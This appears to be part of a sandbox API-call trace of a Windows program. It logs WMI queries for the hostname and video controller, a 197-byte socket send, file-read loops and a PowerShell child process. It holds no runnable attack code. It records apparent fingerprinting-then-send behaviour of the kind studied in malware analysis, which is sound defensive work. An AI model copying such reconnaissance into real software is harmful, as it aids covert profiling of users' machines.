	[0222.742] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd1e320, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0a8 | out: ppvObject=0x1c6ec0a8*=0x1cd1c700) returned 0x0
	[0222.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1c700, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebfb0 | out: ppvObject=0x1c6ebfb0*=0x1cd1c700) returned 0x0
	[0222.743] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1c700, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec030 | out: ppvObject=0x1c6ec030*=0x0) returned 0x80004002
	[0222.743] WbemDefPath:IUnknown:AddRef (This=0x1cd1c700) returned 0x3
	[0222.743] CoGetContextToken (in: pToken=0x1c6ebc80 | out: pToken=0x1c6ebc80) returned 0x0
	[0222.743] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1c700, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc40 | out: ppvObject=0x1c6ebc40*=0x1b8533f0) returned 0x0
	[0222.743] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b8533f0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebc70 | out: pCid=0x1c6ebc70*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0222.743] WbemDefPath:IUnknown:Release (This=0x1b8533f0) returned 0x3
	[0222.743] CoGetContextToken (in: pToken=0x1c6ebc50 | out: pToken=0x1c6ebc50) returned 0x0
	[0222.743] WbemDefPath:IUnknown:AddRef (This=0x1cd1c700) returned 0x4
	[0222.743] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1c700, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebd68 | out: ppvObject=0x1c6ebd68*=0x0) returned 0x80004002
	[0222.744] WbemDefPath:IUnknown:Release (This=0x1cd1c700) returned 0x3
	[0222.744] WbemDefPath:IUnknown:Release (This=0x1cd1c700) returned 0x2
	[0222.744] WbemDefPath:IUnknown:Release (This=0x1cd1e320) returned 0x0
	[0222.744] WbemDefPath:IUnknown:Release (This=0x1cd1c700) returned 0x1
	[0222.744] CoGetContextToken (in: pToken=0x1c6ec980 | out: pToken=0x1c6ec980) returned 0x0
	[0222.744] CoGetContextToken (in: pToken=0x1c6ec8c0 | out: pToken=0x1c6ec8c0) returned 0x0
	[0222.744] WbemDefPath:IUnknown:AddRef (This=0x1cd1c700) returned 0x2
	[0222.744] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1c700, riid=0x1c6eca00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ec9e0 | out: ppvObject=0x1c6ec9e0*=0x1cd1c700) returned 0x0
	[0222.744] WbemDefPath:IUnknown:Release (This=0x1cd1c700) returned 0x2
	[0222.744] WbemDefPath:IUnknown:Release (This=0x1cd1c700) returned 0x1
	[0222.745] CoGetContextToken (in: pToken=0x1c6ecb00 | out: pToken=0x1c6ecb00) returned 0x0
	[0222.745] CoGetContextToken (in: pToken=0x1c6eca40 | out: pToken=0x1c6eca40) returned 0x0
	[0222.745] WbemDefPath:IUnknown:AddRef (This=0x1cd1c700) returned 0x2
	[0222.745] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1c700, riid=0x1c6ecb80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecb60 | out: ppvObject=0x1c6ecb60*=0x1cd1c700) returned 0x0
	[0222.745] WbemDefPath:IUnknown:Release (This=0x1cd1c700) returned 0x2
	[0222.745] WbemDefPath:IUnknown:AddRef (This=0x1cd1c700) returned 0x3
	[0222.745] WbemDefPath:IWbemPath:SetText (This=0x1cd1c700, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x0
	[0222.745] WbemDefPath:IUnknown:Release (This=0x1cd1c700) returned 0x2
	[0222.745] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1c640, puCount=0x1c6ecdc0 | out: puCount=0x1c6ecdc0*=0x2) returned 0x0
	[0222.745] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ecdc0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecdc0*=0x17, pszText=0x0) returned 0x0
	[0222.745] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ecdc0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecdc0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.745] CoTaskMemAlloc (cb=0x8) returned 0x1b858db0
	[0222.745] IEnumWbemClassObject:Next (in: This=0x1cd24e18, lTimeout=-1, uCount=0x1, apObjects=0x1b858db0, puReturned=0x1c6ece78 | out: apObjects=0x1b858db0*=0x0, puReturned=0x1c6ece78*=0x0) returned 0x1
	[0222.747] CoTaskMemFree (pv=0x1b858db0) 
	[0222.747] CoGetContextToken (in: pToken=0x1c6ecc00 | out: pToken=0x1c6ecc00) returned 0x0
	[0222.748] WbemLocator:IUnknown:Release (This=0x1b83cd80) returned 0x1
	[0222.748] IUnknown:Release (This=0x1cd24e18) returned 0x0
	[0222.766] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1c640, puCount=0x1c6ecf20 | out: puCount=0x1c6ecf20*=0x2) returned 0x0
	[0222.766] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ecf20*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf20*=0x17, pszText=0x0) returned 0x0
	[0222.766] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ecf20*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf20*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.766] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecf10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf0c*=0, plFlavor=0x1c6ecf08*=0 | out: pVal=0x1c6ecf10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ecf0c*=8, plFlavor=0x1c6ecf08*=64) returned 0x0
	[0222.766] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0222.766] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64 | out: pVal=0x1c6ecf20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64) returned 0x0
	[0222.766] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0222.766] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1c640, puCount=0x1c6ecf20 | out: puCount=0x1c6ecf20*=0x2) returned 0x0
	[0222.766] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ecf20*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf20*=0x17, pszText=0x0) returned 0x0
	[0222.766] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ecf20*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf20*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.766] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__CLASS", lFlags=0, pVal=0x1c6ecf10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf0c*=0, plFlavor=0x1c6ecf08*=0 | out: pVal=0x1c6ecf10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController", varVal2=0x0), pType=0x1c6ecf0c*=8, plFlavor=0x1c6ecf08*=64) returned 0x0
	[0222.766] SysStringLen (param_1="Win32_VideoController") returned 0x15
	[0222.766] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__CLASS", lFlags=0, pVal=0x1c6ecf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64 | out: pVal=0x1c6ecf20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController", varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64) returned 0x0
	[0222.766] SysStringLen (param_1="Win32_VideoController") returned 0x15
	[0222.767] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1c640, puCount=0x1c6eceb0 | out: puCount=0x1c6eceb0*=0x2) returned 0x0
	[0222.767] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6eceb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6eceb0*=0x17, pszText=0x0) returned 0x0
	[0222.767] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6eceb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6eceb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.767] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1c640, puCount=0x1c6eceb0 | out: puCount=0x1c6eceb0*=0x2) returned 0x0
	[0222.767] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6eceb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6eceb0*=0x17, pszText=0x0) returned 0x0
	[0222.767] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6eceb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6eceb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.767] IWbemClassObject:GetNames (in: This=0x1cd1eb80, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c6ecea8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c6ecea0 | out: pNames=0x1c6ecea0*="\x01ƀ\x08") returned 0x0
	[0222.767] SafeArrayGetDim (psa=0x1b8323e0) returned 0x1
	[0222.767] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__GENUS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ece9c*=3, plFlavor=0x1c6ece98*=64) returned 0x0
	[0222.768] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__CLASS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0222.768] SysStringLen (param_1="Win32_VideoController") returned 0x15
	[0222.768] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0222.768] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__DYNASTY", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0222.768] SysStringLen (param_1="Win32_VideoController") returned 0x15
	[0222.768] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__RELPATH", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0222.768] SysStringLen (param_1="Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x31
	[0222.768] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3b, varVal2=0x0), pType=0x1c6ece9c*=3, plFlavor=0x1c6ece98*=64) returned 0x0
	[0222.768] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__DERIVATION", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b8323e0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b858da0, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c6ece9c*=8200, plFlavor=0x1c6ece98*=64) returned 0x0
	[0222.769] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__SERVER", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0222.769] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0222.769] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0222.769] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0222.769] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__PATH", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0222.769] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x48
	[0222.769] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1c640, puCount=0x1c6ecf40 | out: puCount=0x1c6ecf40*=0x2) returned 0x0
	[0222.769] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ecf40*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf40*=0x17, pszText=0x0) returned 0x0
	[0222.769] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ecf40*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf40*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.769] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="Description", lFlags=0, pVal=0x1c6ecf30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf2c*=0, plFlavor=0x1c6ecf28*=0 | out: pVal=0x1c6ecf30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NVIDIA GeForce 840M", varVal2=0x0), pType=0x1c6ecf2c*=8, plFlavor=0x1c6ecf28*=32) returned 0x0
	[0222.769] SysStringLen (param_1="NVIDIA GeForce 840M") returned 0x13
	[0222.770] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="Description", lFlags=0, pVal=0x1c6ed160*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ed15c*=8, plFlavor=0x1c6ed158*=32 | out: pVal=0x1c6ed160*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NVIDIA GeForce 840M", varVal2=0x0), pType=0x1c6ed15c*=8, plFlavor=0x1c6ed158*=32) returned 0x0
	[0222.770] SysStringLen (param_1="NVIDIA GeForce 840M") returned 0x13
	[0222.772] send (s=0x414, buf=0x31aeac8*, len=197, flags=0) returned 197
	[0222.772] recv (s=0x414, buf=0x303f408, len=502, flags=0) 

Thread:
	id = 170
	os_tid = 0xb84


Thread:
	id = 172
	os_tid = 0x790


Thread:
	id = 175
	os_tid = 0x954


Thread:
	id = 230
	os_tid = 0xbe4


Thread:
	id = 250
	os_tid = 0xc08


Thread:
	id = 253
	os_tid = 0xc14


Thread:
	id = 288
	os_tid = 0xc58


Thread:
	id = 297
	os_tid = 0xc88

	[0216.750] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0216.753] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebf8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebf8*=0x1e, lpOverlapped=0x0) returned 1
	[0217.204] SetEvent (hEvent=0x4ac) returned 1
	[0217.204] SetEvent (hEvent=0x4e8) returned 1
	[0217.204] SetEvent (hEvent=0x4ac) returned 1
	[0217.204] SetEvent (hEvent=0x4e8) returned 1
	[0217.205] SetEvent (hEvent=0x4ac) returned 1
	[0217.205] SetEvent (hEvent=0x4e8) returned 1
	[0217.205] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebb8*=0x2f, lpOverlapped=0x0) returned 1
	[0217.968] SetEvent (hEvent=0x4ac) returned 1
	[0217.968] SetEvent (hEvent=0x4e8) returned 1
	[0217.968] SetEvent (hEvent=0x4ac) returned 1
	[0217.968] SetEvent (hEvent=0x4e8) returned 1
	[0217.969] SetEvent (hEvent=0x4ac) returned 1
	[0217.969] SetEvent (hEvent=0x4e8) returned 1
	[0217.969] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebb8*=0x29, lpOverlapped=0x0) returned 1
	[0217.970] SetEvent (hEvent=0x4ac) returned 1
	[0217.970] SetEvent (hEvent=0x4e8) returned 1
	[0217.970] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebb8*=0x45, lpOverlapped=0x0) returned 1
	[0217.971] SetEvent (hEvent=0x4ac) returned 1
	[0217.971] SetEvent (hEvent=0x4e8) returned 1
	[0217.971] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebb8*=0x36, lpOverlapped=0x0) returned 1
	[0217.972] SetEvent (hEvent=0x4ac) returned 1
	[0217.972] SetEvent (hEvent=0x4e8) returned 1
	[0217.972] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebb8*=0x36, lpOverlapped=0x0) returned 1
	[0218.511] SetEvent (hEvent=0x4ac) returned 1
	[0218.511] SetEvent (hEvent=0x4e8) returned 1
	[0218.511] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebb8*=0x34, lpOverlapped=0x0) returned 1
	[0218.516] SetEvent (hEvent=0x4ac) returned 1
	[0218.516] SetEvent (hEvent=0x4e8) returned 1
	[0218.516] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebb8*=0x43, lpOverlapped=0x0) returned 1
	[0218.520] SetEvent (hEvent=0x4ac) returned 1
	[0218.520] SetEvent (hEvent=0x4e8) returned 1
	[0218.520] SetEvent (hEvent=0x4ac) returned 1
	[0218.520] SetEvent (hEvent=0x4e8) returned 1
	[0218.521] SetEvent (hEvent=0x4ac) returned 1
	[0218.521] SetEvent (hEvent=0x4e8) returned 1
	[0218.521] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebb8*=0x3b, lpOverlapped=0x0) returned 1
	[0218.526] SetEvent (hEvent=0x4ac) returned 1
	[0218.526] SetEvent (hEvent=0x4e8) returned 1
	[0218.526] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebb8*=0x29, lpOverlapped=0x0) returned 1
	[0218.528] SetEvent (hEvent=0x4ac) returned 1
	[0218.528] SetEvent (hEvent=0x4e8) returned 1
	[0218.528] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebb8*=0x37, lpOverlapped=0x0) returned 1
	[0218.530] SetEvent (hEvent=0x4ac) returned 1
	[0218.530] SetEvent (hEvent=0x4e8) returned 1
	[0218.530] SetEvent (hEvent=0x4ac) returned 1
	[0218.530] SetEvent (hEvent=0x4e8) returned 1
	[0218.531] SetEvent (hEvent=0x4ac) returned 1
	[0218.531] SetEvent (hEvent=0x4e8) returned 1
	[0218.531] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebb8*=0x3b, lpOverlapped=0x0) returned 1
	[0218.533] SetEvent (hEvent=0x4ac) returned 1
	[0218.533] SetEvent (hEvent=0x4e8) returned 1
	[0218.533] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020*, lpNumberOfBytesRead=0x1ce1ebb8*=0x29, lpOverlapped=0x0) returned 1
	[0218.534] SetEvent (hEvent=0x4ac) returned 1
	[0218.534] SetEvent (hEvent=0x4e8) returned 1
	[0218.534] ReadFile (in: hFile=0x4ec, lpBuffer=0x30d2020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce1ebb8, lpOverlapped=0x0 | out: lpBuffer=0x30d2020, lpNumberOfBytesRead=0x1ce1ebb8*=0x0, lpOverlapped=0x0) returned 0
	[0218.544] CoUninitialize () 

Thread:
	id = 299
	os_tid = 0xc90

	[0216.994] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0216.995] ReadFile (in: hFile=0x4f8, lpBuffer=0x30d5170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cebea78, lpOverlapped=0x0 | out: lpBuffer=0x30d5170, lpNumberOfBytesRead=0x1cebea78*=0x0, lpOverlapped=0x0) returned 0
	[0218.546] SetEvent (hEvent=0x500) returned 1
	[0218.546] SetEvent (hEvent=0x4ac) returned 1
	[0218.546] SetEvent (hEvent=0x4e8) returned 1
	[0218.546] SetEvent (hEvent=0x504) returned 1
	[0218.546] CoUninitialize () 

Thread:
	id = 305
	os_tid = 0xca8


Thread:
	id = 308
	os_tid = 0xcb4


Thread:
	id = 346
	os_tid = 0xd80


Process:
	id = "12"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3645f000"
	os_pid = "0xaa0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "7"
	os_parent_pid = "0x808"
